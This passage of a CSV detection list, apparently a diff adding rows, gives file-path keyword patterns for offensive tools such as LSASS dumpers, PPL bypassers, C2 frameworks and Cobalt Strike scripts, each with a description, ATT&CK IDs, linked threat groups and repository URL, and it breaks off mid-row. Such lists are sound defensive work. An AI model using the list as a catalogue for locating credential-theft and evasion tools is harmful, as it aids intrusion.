+"*/posh-update*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/post_exploitation*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*/POSTDump.git*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" +"*/postLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/postLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/PowerBruteLogon*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" +"*/powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/powerglot/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/powerloader.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/Powermad.git*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*/power-pwn.git*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*/PowerSCCM.git*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*/PowerSharpPack.git*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*/powershell/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/powershell_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/PowershellKerberos.git*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*/PowerShx.git*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" +"*/PowerTools*","offensive_tool_keyword","empire","Empire power tools like powerview powerbreach powerpick powerup","T1003 - T1078 - T1059 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Information Gathering","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","1932","825","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z" +"*/PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" +"*/PowerView.ps1*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" +"*/PowerView3.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*/PPEnum/*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" +"*/ppl/ppl.c*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*/ppl_dump.*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*/PPLBlade.git*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*/ppldump.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*/PPLDump_BOF/*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" +"*/PPLFault/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/PPLKiller.git*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*/PPLKiller/*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*/pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*/PrimusC2*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*/PrimusC2.git*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" +"*/printerbug.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/PrintMonitorDll.*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/PrintMonitorDll/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/PrintSpoofer.git*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*/PrintSpoofer.git*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*/PrintSpoofer/*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" +"*/Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/privesc/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*/PrivExchange*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*/PrivExchange.git*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*/PrivFu.git*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*/PrivilegeEscalation/*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 